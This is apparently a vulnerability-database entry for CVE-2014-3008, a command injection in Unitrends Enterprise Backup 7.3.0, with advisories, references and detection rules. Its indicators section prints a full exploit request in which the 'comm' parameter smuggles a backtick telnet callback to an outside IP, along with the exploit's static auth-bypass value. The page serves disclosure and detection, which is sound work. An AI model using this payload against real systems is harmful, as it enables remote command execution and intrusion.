CVE-2014-3008
published 2014-04-28CVE-2014-3008: Unitrends Enterprise Backup 7.3.0 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the comm parameter to…
PriorityP261critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
6.96%
93.3th percentile
Unitrends Enterprise Backup 7.3.0 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the comm parameter to recoveryconsole/bpl/snmpd.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| unitrends | enterprise_backup | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlPOST /recoveryconsole/bpl/snmpd.php?type=update&sid=1&comm=notpublic`telnet+172.31.16.166+4444`&enabled=1&rx=4335379&ver=7.3.0&gcv=0↗
- →Detect POST requests to /recoveryconsole/bpl/snmpd.php containing shell metacharacters (backticks, pipes, semicolons) in the 'comm' query parameter, indicating command injection attempts. ↗
- →Alert on the static, predictable auth value '1:/usr/bp/logs.dir/gui_root.log:100' (URL-encoded: 1%3A%2Fusr%2Fbp%2Flogs%2Edir%2Fgui%5Froot%2Elog%3A100) appearing in POST body to any endpoint, as it indicates exploitation of the non-random auth bypass. ↗
- →Flag requests where the 'comm' parameter value begins with 'notpublic' followed by backtick-enclosed commands, matching the exploit's injection pattern. ↗
- →Monitor for outbound telnet connections initiated from the Unitrends server process, consistent with the proof-of-concept callback payload. ↗
- →Inspect the Referer header for requests to snmpd.php; the exploit uses 'recoveryconsole/bpria/bin/bpria.swf' as referer, which may help correlate malicious sessions. ↗
- ·The Metasploit module defaults to SSL (port 443); network detection rules must account for HTTPS traffic and may require SSL inspection to detect the malicious POST body. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
Unitrends Enterprise Backup 7.3.0 comm os command injection (EDB-32885 / XFDB-92642)
vuldb·2026-05-12·CVSS 10.0
CVE-2014-3008 [CRITICAL] Unitrends Enterprise Backup 7.3.0 comm os command injection (EDB-32885 / XFDB-92642)
A vulnerability has been found in Unitrends Enterprise Backup 7.3.0 and classified as critical. This issue affects some unknown processing. Performing a manipulation of the argument comm results in os command injection.
This vulnerability was named CVE-2014-3008. The attack may be initiated remotely. In addition, an exploit is available.
GHSA
GHSA-h2r3-7m2h-5fxq: Unitrends Enterprise Backup 7
ghsa_unreviewed·2022-05-17
CVE-2014-3008 [HIGH] CWE-78 GHSA-h2r3-7m2h-5fxq: Unitrends Enterprise Backup 7
Unitrends Enterprise Backup 7.3.0 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the comm parameter to recoveryconsole/bpl/snmpd.php.
No detection rules found.
No writeups or analysis indexed.
http://seclists.org/fulldisclosure/2014/Apr/204http://secunia.com/advisories/58001http://www.exploit-db.com/exploits/32885http://www.securityfocus.com/bid/66928https://exchange.xforce.ibmcloud.com/vulnerabilities/92642https://gist.github.com/brandonprry/10745756http://seclists.org/fulldisclosure/2014/Apr/204http://secunia.com/advisories/58001http://www.exploit-db.com/exploits/32885http://www.securityfocus.com/bid/66928https://exchange.xforce.ibmcloud.com/vulnerabilities/92642https://gist.github.com/brandonprry/10745756
2014-04-28
Published